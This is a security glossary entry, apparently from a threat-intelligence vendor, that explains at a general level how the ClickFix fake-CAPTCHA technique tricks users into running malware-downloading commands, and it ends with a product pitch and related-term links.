ClickFix
Also known as: Click Fix, Fake CAPTCHA attack
ClickFix is a social-engineering technique that tricks users into running a malicious command themselves — typically via a fake CAPTCHA or error page instructing them to paste text into the Windows Run dialog or terminal. It has become a major delivery method for infostealers like LummaC2.
What is ClickFix?
ClickFix presents a victim with a fake verification or error message ("verify you are human", "fix this error") that instructs them to copy a provided command and paste it into the Windows Run dialog (Win+R) or a terminal. Running it downloads and executes malware — the user effectively infects their own machine.
Why ClickFix works
It bypasses many automated defences because the user, not an exploit, executes the payload. The fake CAPTCHA framing exploits user familiarity with verification prompts, making the instruction feel routine.
ClickFix is a leading delivery route for modern stealers; VantaPrism captures the resulting stolen data, helping defenders quantify exposure from these self-inflicted infections.
Check Your Exposure arrow_forwardFrequently Asked Questions
Why is ClickFix hard to block?
What does a ClickFix attack look like?
Related Terms
Lumma Stealer (LummaC2) is a malware-as-a-service infostealer that steals browser credentials, cookies, cryptocurrenc…
Infostealer malware is a category of malicious software designed to silently harvest sensitive data — passwords, sess…
Malvertising is the use of online advertising — including paid search ads — to distribute malware. Attackers buy ads…
Phishing is a social-engineering attack that deceives victims into revealing credentials or running malware, usually…